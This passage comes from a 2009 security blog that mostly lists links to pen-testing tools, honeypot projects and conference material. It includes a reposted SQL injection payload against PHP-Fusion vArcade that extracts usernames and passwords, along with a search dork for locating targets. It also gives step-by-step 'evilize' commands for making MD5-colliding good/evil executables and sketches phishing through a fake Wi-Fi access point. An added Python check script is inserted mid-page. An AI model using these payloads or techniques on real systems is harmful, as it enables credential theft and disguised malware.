<span style="font-weight: bold;">Security Hack</span> - Personal site of Ariel M. Liguori De Gottig (author: Ariel M. Liguori de Gottig, http://www.blogger.com/profile/02714929794781699420; feed last updated 2024-03-06)<br /><br /><span style="font-weight: bold;">LDAP Injector</span> (2009-05-05)<br /><br />As some of you will remember, at BH EU 08 Chema and José Parada presented <a href="http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf">a paper on LDAP Injection & Blind LDAP Injection</a> in which, besides explaining the concepts behind these techniques, they used a tool to achieve their (admittedly malicious :) ) purposes. That tool has just been released; it has a very descriptive name, <a href="http://www.informatica64.com/foca/download/ldapInjector_0_2_1_0.zip"><i><b>LDAP Injector</b></i></a>, and can now be downloaded <a href="http://www.informatica64.com/foca/download/ldapInjector_0_2_1_0.zip">here</a>. Make the most of it!<br />
<br />
Regards,<br /><br /><span style="font-weight: bold;">FOCA 0.7.6.4 Released: Analyzing metadata everywhere!</span> (2009-05-04)<br /><br />Chema (a.k.a. <i>El Maligno</i>) has finally published the complete user manual for <b>FOCA</b>, which can be used through the web at <a href="http://www.informatica64.com/FOCA/">http://www.informatica64.com/FOCA/</a> or downloaded here: <a href="http://www.informatica64.com/DownloadFOCA/">http://www.informatica64.com/DownloadFOCA/</a>. As many of you already know, FOCA is an excellent tool for extracting and analyzing the metadata found in files published on the web. Thanks, Chema!<br />
<br />
Links to the user manual:<br />
- <a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-i-de-iv.html">FOCA: User Manual [I of IV]</a><br />
- <a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-ii-de-iv.html">FOCA: User Manual [II of IV]</a><br />
- <a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-iii-de-iv.html">FOCA: User Manual [III of IV]</a><br />
- <a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-iv-de-iv.html">FOCA: User Manual [IV of IV]</a><br />
<br />
More info:<br />
- <a href="http://elladodelmal.blogspot.com/">Un Informático del lado del mal</a><br /><br /><span style="font-weight: bold;">Creating a fake access point and using it for phishing.</span> (2009-03-23)<br /><br />Last Friday, at the last minute before leaving the office, I came across a note from <a href="http://opensec.es/">OpenSec</a> referring to the possibility of <a href="http://opensec.es/2009/03/20/creando-un-punto-de-acceso-falso-airbase-ng/">creating a fake access point using airbase-ng</a>; their post describes the whole procedure for accomplishing this. After reading it I could not help telling myself: what a great opportunity for phishing! Unfortunately this is not good news, but it is a reality that is surely already happening.<br />
<br />
What does this <i><b>new concept of phishing</b></i> consist of, in which the victim is to blame for using a network that is not their own? Suppose that, following the procedure written up by the OpenSec people, we create an access point with an attractive, tempting name (Free Wifi-HighSpeed or similar). Many users would connect and, in principle, nothing bad would happen, unless a bad guy is behind all this. And how could that be? Simple: by creating fake home banking pages, email accounts and so on; remember that he is the owner of the access point and can steer us however he likes. I will not go into further detail, but it is clear that configuring a DNS server to do this kind of thing is not too difficult; one could easily set up a fake gmail, homebank, etc. and redirect those requests to one's own server (which could even be local).<br />
<br />
So be careful which networks you connect to!<br />
<br />
Regards,<br /><br /><span style="font-weight: bold;">HoneyBoys: The eternal chase.</span> (2009-03-19)<br /><br />This is a post I had promised myself, especially after hearing talk of <a href="http://es.wikipedia.org/wiki/Honeypot">honeypots</a> and <a href="http://es.wikipedia.org/wiki/Honeynet">honeynets</a> from countless places. As many already know, honeypots are nothing more than systems designed to attract crackers in order to analyze their behavior and, in particular, to discover them (although it does not always work that way). Following this line of thought, HoneyNets were born, which are no longer individual devices doing that job but an entire network dedicated solely to it. Obviously this evolves day by day and there are <a href="http://www.honeynet.org.es/">numerous</a> <a href="http://www.honeynet.org.mx/">projects</a> dedicated to this mission; likewise, new concepts emerge over time, such as <a href="http://en.wikipedia.org/wiki/Honeyclient">Honey Clients</a>, which <a href="http://blog.s21sec.com/2009/03/honeyclient-aka-ir-buscarla.html">have recently started to be discussed</a>.<br />It is really something worth talking about, and it shows us how the good guys (HoneyBoys from now on) devote their ingenuity and time to discovering new threats, attack vectors, etc. 
Applause for them, and a model for us to follow, and here I am referring specifically to Argentinians. <br /><br /><div style="text-align: center;"><span style="font-size:130%;"><span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);">When will there be a HoneyNet made in Argentina?</span></span><br /></div><br /><span style="font-style: italic;">Links of interest:</span><br /><ul><li><a href="http://www.honeynet.org.mx/">HoneyNet Project Mexico</a></li><li><a href="http://www.honeynet.org.es/">HoneyNet Project Spain</a></li><li><a href="http://blog.segu-info.com.ar/">Segu-Info</a> and <a href="http://blog.s21sec.com/">S21Sec</a>.</li></ul><br /><br />Regards,<br /><br /><span style="font-weight: bold;">More Emulation - Interesting Links</span> (2009-03-13)<br /><br />So that you can practice to exhaustion this weekend, here are several of the links that guide me whenever I venture into this area:<br /><br /><a href="http://www.andersonalves.net/">Anderson Alves WebPage</a><br /><a href="http://www.netemu.cn/">NetEMU</a><br /><a href="http://7200emu.hacki.at/">Hacki's</a><br /><br />Indispensable whenever you want to emulate something ;-)<br /><br /><span style="font-weight: bold;">Playing with a Cisco IPS-4215 [At Home]</span> (2009-03-13)<br /><br />As I already mentioned <a href="http://sechack.blogspot.com/2009/03/emula-emulador.html">in a previous post</a>, nowadays "emulation" as a source of potential knowledge and expertise is being taken advantage of. 
A clear example is the possibility of emulating (in this case) a Cisco IPS, specifically an IPS-4215 v5 (we will do the corresponding upgrade later).<br /><br />Below I leave you a brief explanation by einval of how this works and also how to put it into practice. I have already tried it and successfully added this device to my test lab (which we will talk about later).<br /><br /><a href="http://www.zengl.net/Cisco_IPS/">Running IPSv5 on VMware by Einval</a><br /><br />If you cannot get it to work, let me know, because I have the VM image ready to upload.<br /><br />Regards,<br />AL<br /><br /><span style="font-weight: bold;">Asegur@IT V Videos</span> (2009-03-11)<br /><br />The videos of the Asegur@IT V demos are now available; as you know, you can find them on <a href="http://www.slideshare.net/chemai64">Chema's slideshare</a> or, if you are lazy, you can drop by <a href="http://elladodelmal.blogspot.com/2009/03/asegurit-v-online.html">El Maligno's page</a> and <a href="http://conexioninversa.blogspot.com/2009/03/videos-de-las-demos-del-asegurit.html">Conexión Inversa's</a>.<br />I hope you like them.<br /><br />Regards,
<br /><br /><span style="font-weight: bold;">Hardening: there are things we must keep in mind.</span> (2009-03-10)<br /><br />Today I read on the <a href="http://blog.segu-info.com.ar">segu-info blog</a> a news item about "<a href="http://blog.segu-info.com.ar/2009/03/hardening-basico-de-gnulinux-e.html">Basic hardening of GNU/Linux and basic installation and configuration of Snort</a>", which is actually a video showing us how to protect our OS in simple steps.<br />Here is something that crosses my mind every time I talk or read about "hardening": don't we all want our system to be secure? Then why don't we take an interest in what proper hardening of the OS we run would look like?<br />Many may see it as a realization that comes with time and experience; however, I believe it should be quite the opposite, since protecting our system is essential and basic, and even the greenest newcomer should be familiar with the steps needed to reach that goal.<br /><br /><span style="font-weight: bold;">Interesting information security mailing lists.</span> (2009-03-05)<br /><br />Here is a link with the infosec lists you "should" be subscribed to:<br /><br />http://seclists.org/<br /><br />Of these I highly recommend subscribing to:<br /><br />- Full Disclosure<br />- Pen-Test<br />- Bugtraq<br /><br />The rest are of general interest; you know your tastes better than I do, so I will let you choose ;-)
<br /><br /><span style="font-weight: bold;">Penetration Test Frameworks: AS/400 & Wireless</span> (2009-01-30)<br /><br />Today I bring you something that may turn out to be very interesting when performing pen testing: yes, more frameworks ;-).<br />The people at <a href="http://www.security-database.com">Security Database</a> have developed a framework for pen-testing AS/400 systems; although it is still in "Beta", we can access it and more information here: <a href="http://www.security-database.com/toolswatch/AS-400-Auditing-Framework-Beta.html">AS 400 Auditing Framework Tool</a>.<br /><a href="http://www.security-database.com/toolswatch/IMG/png/AS400_Auditing.png"><img style="display:block; margin:0px auto 10px; text-align:center; width: 120px; height: 120px;" src="http://www.security-database.com/toolswatch/IMG/png/AS400_Auditing.png" border="0" alt="AS/400 Auditing Framework screenshot" /></a><br /><br />On the other hand, I am also adding information about an existing framework for pen-testing wireless networks: <a href="http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html">Wireless Penetration</a>.<br /><a href="http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html_files/image.png"><img style="display:block; margin:0px auto 10px; text-align:center; width: 120px; height: 120px;" src="http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html_files/image.png" border="0" alt="Wireless Penetration Test Framework screenshot" /></a><br /><br /><br />I hope it is as useful to you as it is to me.<br />Regards,
<br /><br /><span style="font-weight: bold;">Malware Analysis.</span> (2009-01-14)<br /><br />Somewhere on the web, I really do not remember where, I came across the link to this document, which introduces us to a sort of FAQ on malware and, above all, on its analysis.<br /><br /><a href="http://docs.google.com/View?docid=ddkp262g_4ftzh5mhg">Análisis de Malware</a><br /><br />Enjoy it!<br /><br />Regards,<br /><br /><span style="font-weight: bold;">Videos and Presentations: DISI 2008</span> (2009-01-13)<br /><br />All the information about DISI 2008 is available on the <a href="http://www.youtube.com/user/upm">UPM YouTube channel</a>. I recommend you take a look, it is worth it ;-)<br /><br />Regards,<br /><br /><span style="font-weight: bold;">MD5 Collision Demo</span> (2009-01-12)<br /><br />I share with you this note I read <a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/">here</a>.<br /><br /><span style="font-weight:bold;">Collisions in the MD5 cryptographic hash function</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> It is now well known that the cryptographic hash function MD5 has been broken. In March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an <a href="http://www.infosec.sdu.edu.cn/paper/md5-attack.pdf">article</a> in which they describe an algorithm that can find two different sequences of 128 bytes with the same MD5 hash. 
One famous such pair is the following: <pre>d131dd02c5e6eec4693d9a0698aff95c 2fcab5<span style="color:red;">8</span>712467eab4004583eb8fb7f89<br />55ad340609f4b30283e4888325<span style="color:red;">7</span>1415a 085125e8f7cdc99fd91dbd<span style="color:red;">f</span>280373c5b<br />d8823e3156348f5bae6dacd436c919c6 dd53e2<span style="color:red;">b</span>487da03fd02396306d248cda0<br />e99f33420f577ee8ce54b67080<span style="color:red;">a</span>80d1e c69821bcb6a8839396f965<span style="color:red;">2</span>b6ff72a70<br /></pre> and <pre>d131dd02c5e6eec4693d9a0698aff95c 2fcab5<span style="color:red;">0</span>712467eab4004583eb8fb7f89<br />55ad340609f4b30283e4888325<span style="color:red;">f</span>1415a 085125e8f7cdc99fd91dbd<span style="color:red;">7</span>280373c5b<br />d8823e3156348f5bae6dacd436c919c6 dd53e2<span style="color:red;">3</span>487da03fd02396306d248cda0<br />e99f33420f577ee8ce54b67080<span style="color:red;">2</span>80d1e c69821bcb6a8839396f965<span style="color:red;">a</span>b6ff72a70<br /></pre> Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4. Ben Laurie has a nice website that <a href="http://www.links.org/?p=6" althref="http://web.archive.org/web/20060210033801/http://www.shmoo.com/md5-collision.html">visualizes this MD5 collision</a>. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl's <a href="http://www.unixwiz.net/techtips/iguide-crypto-hashes.html">Illustrated Guide</a>. </td></tr></tbody></table> <span style="font-weight:bold;">Exploits</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> As we will explain below, the algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. 
Several people have used this technique to create pairs of interesting files with identical MD5 hashes: <ul><li>Magnus Daum and Stefan Lucks have created <a href="http://www.cits.rub.de/MD5Collisions/">two PostScript files with identical MD5 hash</a>, of which one is a letter of recommendation, and the other is a security clearance. </li><li>Eduardo Diaz has described a <a href="http://www.codeproject.com/dotnet/HackingMd5.asp">scheme</a> by which two programs could be packed into two archives with identical MD5 hash. A special "extractor" program turns one archive into a "good" program and the other into an "evil" one. </li><li>In 2007, Marc Stevens, Arjen K. Lenstra, and Benne de Weger used an improved version of Wang and Yu's attack known as the <a href="http://www.win.tue.nl/hashclash/SoftIntCodeSign/">chosen prefix collision</a> method to produce two executable files with the same MD5 hash, but different behaviors. Unlike the old method, where the two files could only differ in a few carefully chosen bits, the chosen prefix method allows two completely arbitrary files to have the same MD5 hash, by appending a few thousand bytes at the end of each file. (Added Jul 27, 2008). </li></ul> </td></tr></tbody></table> <span style="font-weight:bold;">An evil pair of executable programs</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> The following is an improvement of Diaz's example, which does not need a special extractor. Here are two pairs of executable programs (one pair runs on Windows, one pair on Linux). <ul><li><b>Windows version:</b> <ul><li><a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/hello.exe">hello.exe</a>. MD5 Sum: cdc47d670159eef60916ca03a9d4a007 </li><li><a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/erase.exe">erase.exe</a>. MD5 Sum: cdc47d670159eef60916ca03a9d4a007 </li></ul> </li><li><b>Linux version (i386):</b> <ul><li><a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/hello">hello</a>. 
MD5 Sum: da5c61e1edc0f18337e46418e48c1290 </li><li><a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/erase">erase</a>. MD5 Sum: da5c61e1edc0f18337e46418e48c1290 </li></ul> </li></ul> These programs must be run from the console. </td></tr></tbody></table><br /><span style="font-weight:bold;">How it works</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> The above files were generated by exploiting two facts: the block structure of the MD5 function, and the fact that Wang and Yu's technique works for an arbitrary initialization vector. To understand what this means, it is useful to have a general idea of how the MD5 function processes its input. This is done by an iteration method known as the Merkle-Damgard method. A given input file is first padded so that its length will be a multiple of 64 bytes. It is then divided into individual 64-byte blocks <i>M</i><sub>0</sub>, <i>M</i><sub>1</sub>, ..., <i>M</i><sub><i>n</i>-1</sub>. The MD5 hash is computed by computing a sequence of 16-byte <b>states</b> <i>s</i><sub>0</sub>, ..., <i>s</i><sub><i>n</i></sub>, according to the rule: <nobr><i>s</i><sub><i>i</i>+1</sub> = <i>f</i>(<i>s</i><sub><i>i</i></sub>, <i>M<sub>i</sub></i>)</nobr>, where <i>f</i> is a certain fixed (and complicated) function. Here, the initial state <i>s</i><sub>0</sub> is fixed, and is called the <b>initialization vector</b>. The final state <i>s</i><sub><i>n</i></sub> is the computed MD5 hash. <p> The method of Wang and Yu makes it possible, for a given initialization vector <i>s</i>, to find two pairs of blocks <span style="color:red;"><i>M</i>,<i>M</i>'</span> and <span style="color:red;"><i>N</i>,<i>N</i>'</span>, such that <i>f</i>(<i>f</i>(<i>s</i>, <span style="color:red;"><i>M</i></span>), <span style="color:red;"><i>M</i>'</span>) = <i>f</i>(<i>f</i>(<i>s</i>, <span style="color:red;"><i>N</i></span>), <span style="color:red;"><i>N</i>'</span>). 
It is important that this works for any initialization vector <i>s</i>, and not just for the standard initialization vector <i>s</i><sub>0</sub>. </p><p> Combining these observations, it is possible to find pairs of files of arbitrary length, which are identical except for 128 bytes somewhere in the middle of the file, and which have identical MD5 hash. Indeed, let us write the two files as sequences of 64-byte blocks: </p><p> <nobr> <i>M</i><sub>0</sub>, <i>M</i><sub>1</sub>, ..., <i>M</i><sub><i>i</i>-1</sub>, <span style="color:red;"><i>M</i><sub><i>i</i></sub>, <i>M</i><sub><i>i</i>+1</sub></span>, <i>M</i><sub><i>i</i>+2</sub>, ..., <i>M</i><sub><i>n</i></sub>, </nobr> </p><p> <nobr> <i>M</i><sub>0</sub>, <i>M</i><sub>1</sub>, ..., <i>M</i><sub><i>i</i>-1</sub>, <span style="color:red;"><i>N</i><sub><i>i</i></sub>, <i>N</i><sub><i>i</i>+1</sub></span>, <i>M</i><sub><i>i</i>+2</sub>, ..., <i>M</i><sub><i>n</i></sub>. </nobr> </p><p> The blocks at the beginning of the files, <i>M</i><sub>0</sub>, ..., <i>M</i><sub><i>i</i>-1</sub>, can be chosen arbitrarily. Suppose that the internal state of the MD5 hash function after processing these blocks is <i>s</i><sub><i>i</i></sub>. Now we can apply Wang and Yu's method to the initialization vector <i>s</i><sub><i>i</i></sub>, to find two pairs of blocks <span style="color:red;"><i>M</i><sub><i>i</i></sub>, <i>M</i><sub><i>i</i>+1</sub></span> and <span style="color:red;"><i>N</i><sub><i>i</i></sub>, <i>N</i><sub><i>i</i>+1</sub></span>, such that </p><p> <i>s</i><sub><i>i</i>+2</sub> = <i>f</i>(<i>f</i>(<i>s</i><sub><i>i</i></sub>, <span style="color:red;"><i>M<sub>i</sub></i></span>), <span style="color:red;"><i>M</i><sub><i>i</i>+1</sub></span>) = <i>f</i>(<i>f</i>(<i>s</i><sub><i>i</i></sub>, <span style="color:red;"><i>N<sub>i</sub></i></span>), <span style="color:red;"><i>N</i><sub><i>i</i>+1</sub></span>). 
</p><p> This guarantees that the internal state <i>s</i><sub><i>i</i>+2</sub> after the first <i>i</i>+2 blocks will be the same for the two files. Finally, the remaining blocks <i>M</i><sub><i>i</i>+2</sub>, ..., <i>M</i><sub><i>n</i></sub> can again be chosen arbitrarily. </p><p> So how can we use this technique to produce a pair of programs (or PostScript files) that have identical MD5 hash, yet behave in arbitrarily different ways? This is simple. All we have to do is write the two programs like this: </p><p> </p><pre><b>Program 1:</b> if (data1 == data1) then { good_program } else { evil_program }<br /><b>Program 2:</b> if (data2 == data1) then { good_program } else { evil_program }<br /></pre> <p> and arrange things so that "data1" = <span style="color:red;"><i>M</i><sub><i>i</i></sub>, <i>M</i><sub><i>i</i>+1</sub></span> and "data2" = <span style="color:red;"><i>N</i><sub><i>i</i></sub>, <i>N</i><sub><i>i</i>+1</sub></span> in the above scheme. This can even be done in a compiled program, by first compiling it with dummy values for data1 and data2, and later replacing them with the properly computed values. </p></td></tr></tbody></table> <span style="font-weight:bold;">Do it yourself: the "evilize" library</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> Here, you can download the software that I used to create MD5-colliding executable files. <ul><li>Download: <a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/evilize-0.1.tar.gz">evilize-0.1.tar.gz</a>. </li></ul> This software is based on Patrick Stach's implementation of Wang and Yu's algorithm. You can find his original implementation <a href="http://www.stachliu.com/md5coll.c">here</a>. <h4>Quick usage instructions:</h4> <p> Note for Windows users: the below instructions are for Unix/Linux. On Windows, you may have to append ".exe" to the names of executable files. Also, to use "make", you must have the GNU tools installed and working. 
</p><ol><li>Unpack the archive and build the library and tools: <pre> tar zxf evilize-0.1.tar.gz<br /> cd evilize-0.1<br /> make<br /></pre> This creates the programs "evilize", "md5coll", and the object file "goodevil.o". </li><li> Create a C program with multiple behaviors. Instead of the usual top-level function main(), write two separate top-level functions main_good() and main_evil(). See the file hello-erase.c for a simple example. </li><li> Compile your program and link against goodevil.o. For example: <pre> gcc hello-erase.c goodevil.o -o hello-erase<br /></pre> </li><li> Run the following command to create an initialization vector: <pre> ./evilize hello-erase -i<br /></pre> </li><li> Create an MD5 collision by running the following command (but replace the vector on the command line with the one you found in step 4): <pre> ./md5coll 0x23d3e487 0x3e3ea619 0xc7bdd6fa 0x2d0271e7 > init.txt<br /></pre> Note: this step can take several hours. </li><li> Create a pair of good and evil programs by running: <pre> ./evilize hello-erase -c init.txt -g good -e evil<br /></pre> Here "good" and "evil" are the names of the two programs generated, and "hello-erase" is the name of the program you created in step 3. <p> NOTE: steps 4-6 can also be done in a single step, as follows: </p><pre> ./evilize hello-erase -g good -e evil<br /></pre> However, I prefer to do the steps separately, since step 5 takes so long. </li><li> Check the MD5 checksums of the files "good" and "evil"; they should be the same. </li><li> Run the programs "good" and "evil" - they should exhibit the two different behaviors that you programmed in step 2. </li></ol></td></tr></tbody></table><br /><br />Source: <a href="http://www.mathstat.dal.ca/%7Eselinger/">Peter Selinger's WebPage</a>.
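As an added check (not code from Selinger's page or the evilize tool), the following Python script verifies the Wang-Yu pair quoted above with hashlib and demonstrates the Merkle-Damgård property the "How it works" section relies on: an identical suffix appended to both blocks keeps the hashes equal, while a changed prefix breaks the pair, and SHA-256 still tells the two blocks apart. The suffix and prefix strings are constructed here.

```python
"""Verify the published MD5 collision pair and the block-chaining property
behind the identical-prefix / arbitrary-suffix construction described above."""
import hashlib

# The two 128-byte colliding inputs quoted on the page (spaces removed).
BLOCK_A = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70"
)
BLOCK_B = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70"
)
EXPECTED_MD5 = "79054025255fb1a26e4bc422aef54eb4"  # hash stated on the page


def md5_hex(data):
    """MD5 digest as a lowercase hex string."""
    return hashlib.md5(data).hexdigest()


def differing_byte_offsets(a, b):
    """Byte offsets at which the two blocks differ; for this pair it is only
    the six bytes whose high nibble is highlighted in red above."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def collides_with_suffix(a, b, suffix):
    """MD5 iterates s_{i+1} = f(s_i, M_i). Once both inputs reach the same
    internal state (after the two colliding 64-byte blocks), any identical
    suffix is absorbed from that same state, so the final hashes stay equal."""
    return md5_hex(a + suffix) == md5_hex(b + suffix)


def collides_with_prefix(a, b, prefix):
    """Prepending data changes the state the colliding blocks are hashed from.
    This pair was computed for the standard IV s_0, so it no longer collides
    under a different prefix; the attacker must fix the prefix first and then
    compute blocks for the resulting state s_i, as the page explains."""
    return md5_hex(prefix + a) == md5_hex(prefix + b)


def sha256_distinguishes(a, b):
    """Mitigation check: a collision-resistant hash separates the pair."""
    return hashlib.sha256(a).hexdigest() != hashlib.sha256(b).hexdigest()


if __name__ == "__main__":
    # Constructed sample data standing in for the arbitrary trailing blocks.
    suffix = b"constructed trailing data, identical in both files"
    print("md5(A) =", md5_hex(BLOCK_A))
    print("md5(B) =", md5_hex(BLOCK_B))
    print("differing byte offsets:", differing_byte_offsets(BLOCK_A, BLOCK_B))
    print("collide with identical suffix:", collides_with_suffix(BLOCK_A, BLOCK_B, suffix))
    print("collide with changed prefix:", collides_with_prefix(BLOCK_A, BLOCK_B, b"x"))
    print("sha256 distinguishes them:", sha256_distinguishes(BLOCK_A, BLOCK_B))
```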
<br /><br /><span style="font-weight: bold;">PenTest of Oracle Databases</span> (2009-01-10)<br /><br />As promised...<br />Penetration testing usually involves several areas, and databases stand out among them. In this post I will show you the _not_so_ well-known tools for pen-testing Oracle databases.<br /><span style="font-weight: bold;"><br /><a href="http://www.cqure.net/wp/oscanner/">OScanner</a></span>: <span style="font-style: italic;">Oscanner is an Oracle assessment framework developed in Java. It has a plugin-based architecture and comes with a couple of plugins that currently do:<br /><br />- Sid Enumeration<br />- Password tests (common & dictionary)<br />- Enumerate Oracle version<br />- Enumerate account roles<br />- Enumerate account privileges<br />- Enumerate account hashes<br />- Enumerate audit information<br />- Enumerate password policies<br />- Enumerate database links<br /><br />The results are given in a graphical java tree.</span><br /><br /><span style="font-weight: bold;"><a href="http://www.cqure.net/wp/test/">Oracle Auditing Tools (OAT)</a></span>: <span style="font-style: italic;">The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.</span><br /><br /><span style="font-weight: bold;"><a href="http://www.cqure.net/wp/dbpwaudit/">DBPwAudit</a></span>: <span style="font-style: italic;">DBPwAudit is a Java tool that allows you to perform online audits of password quality for several database engines. The application design allows for easy adding of additional database drivers by simply copying new JDBC drivers to the jdbc directory. 
Configuration is performed in two files: the aliases.conf file is used to map drivers to aliases, and the rules.conf file tells the application how to handle error messages from the scan.</span><br /><br /><span style="font-weight: bold;"><a href="http://www.cqure.net/wp/sidguesser/">SidGuesser</a></span>: <span style="font-style: italic;">Guesses sids/instances against an Oracle database according to a predefined dictionary file.</span><br /><br /><br /><span style="font-style: italic;">Links of interest:</span><br /><ul><li><a href="http://www.securityfocus.com/infocus/1689">Introduction to Simple Oracle Auditing</a></li><li><a href="http://www.petefinnigan.com/papers/audit.sql">Peter Finnigan - Audit.sql</a></li><li><a href="https://metalink.oracle.com/">Oracle Metalink</a></li><li><a href="http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=whitepapers">Papers on pen-testing Oracle DBs</a></li></ul><br /><br /><span style="font-weight: bold;">XSS - Cross Site Scripting</span> (2009-01-09)<br /><br />Today I have dug up this topic again, one I had already forgotten because of its limited and ineffective use (still, there is always someone we can make fall for it ¬¬). However, I am here only to show you a couple of documents with good information on the subject:<br /><br /><a href="http://www.cis.upenn.edu/~cis551/XSS.pdf">XSS - Cross Site Scripting Explained (PDF in English).</a><br /><a href="http://www.soulblack.com.ar/repo/papers/minituto-xss.pdf">Cross Site Scripting - By Soulblack (PDF in Spanish).</a><br /><br />Regards,
<br /><br /><span style="font-weight: bold;">SQL Injection Vulnerability in PHP-Fusion.</span> (2009-01-09)<br /><br />Use with care and for educational purposes only :)<br /><br />----------------------------------------------------------------<br />Script : PHP-Fusion Mod vArcade 1.8<br />Type : Sql Injection Vulnerability<br />Risk : <span style="font-weight: bold; color: rgb(255, 0, 0);">High</span><br />----------------------------------------------------------------<br />Download From : <a href="http://venue.nu/">http://venue.nu/</a><br />----------------------------------------------------------------<br />Discovered by : Khashayar Fereidani<br />My Official Website : <a href="http://fereidani.ir/">http://FEREIDANI.IR</a><br />Our Team Website : <a href="http://ircrash.com/">http://IRCRASH.COM</a><br />Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com<br /><br />----------------------------------------------------------------<br />Sql Injection Vulnerability :<br /><br />Vulnerable address : <span style="font-weight: bold;">http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*</span><br /><br /><span style="font-weight: bold; font-style: italic;">Google Dark : inurl:/infusions/varcade/</span><br />----------------------------------------------------------------<br /> Tnx : God<br /><a href="http://ircrash.com/"> http://IRCRASH.COM</a> <a href="http://fereidani.ir/">http://FEREIDANI.IR</a><br />----------------------------------------------------------------
<br /><br /><span style="font-weight: bold;">Penetration Testing Tools</span> (2009-01-08)<br /><br /><span style="font-weight: bold;">A very complete list of pen-testing tools; all the info was taken from <a href="http://www.forinsect.de/pentest/pentest-tools.html">forinsect</a>.</span><br /><br /><span style="font-weight: bold;">Packet Shaper:</span><br />• Nemesis: a command line packet shaper<br />• Packit: The Packet Toolkit - A network packet shaper.<br />• Hping by Antirez: a command line TCP/IP packet shaper<br />• Sing: stands for 'Send ICMP Nasty Garbage'; sends fully customizable ICMP packets<br />• Scapy: a new python-based packet generator<br /><br /><span style="font-weight: bold;">Password Cracker/Login Hacker:</span><br />• John the Ripper: a well-known password cracker for Windows and *nix Systems<br />• Djohn: a distributed password cracker based on "John the Ripper"<br />• Cain & Abel: an advanced password recovery tool for Windows systems. It sniffs network packets and cracks authentication by brute force or with dictionary attacks.<br />• Project RainbowCrack: Advanced instant NT password cracker<br />• Rainbowtables: The shmoo group provides pre-generated rainbow tables for bittorrent download. The tables are generated with RainbowCrack (see above).<br />• Windows NT password recovery tool by Peter Nordahl<br />• THC-Dialup Login Hacker by THC. It tries to guess username and password against the modem carrier. As far as I know the only available dialup password guesser for *NIX.<br />• Hydra by THC: a multi-protocol login hacker. 
Hydra is also integrated with Nessus.<br />• Medusa: parallel network login auditor<br />• THC imap bruter: a very fast imap password brute forcer<br />• x25bru: a login/password bruteforcer for x25 pad<br />• Crowbar: a generic web brute force tool (Windows only; requires .NET Framework)<br />• MDCrack-NG: a very fast MD4/MD5/NTLMv1 hash cracker; works optionally with precomputed hash tables<br /><span id="fullpost"><br /><span style="font-weight: bold;">Advanced Sniffers:</span><br />• Wireshark (formerly known as Ethereal): an open source network protocol analyzer<br />• Dsniff by Dug Song: a combination of very useful sniffer and man-in-the-middle attack tools<br />• Ettercap: a multipurpose sniffer/interceptor/logger for switched LAN environments<br />• aimsniffer: monitors AOL instant messager communication on the network<br />• 4G8: a tool ,similar to ettercap, to capture network traffic in switched environments<br />• cdpsniffer: Cisco discovery protocol (CDP) decoding sniffer<br /><br /><span style="font-weight: bold;">Port Scanner / Information Gathering:</span><br />• nmap: the currently most well-known port scanner. Since version 3.45 it supports version scans. Have a look at PBNJ for diffing different nmap scans.<br />• ISECOM released their nmap wrapper NWRAP, which shows all known protocols for the discovered ports form the Open Protocol Resource Database<br />• Nmap::Scanner: Perl output parser for nmap<br />• Amap by THC: An advanced portscanner which determines the application behind a network port by its application handshake. Thus it detects well-known applications on non-standard ports or unknown applications on well-known ports.<br />• vmap by THC: version mapper to determine the version (sic!) 
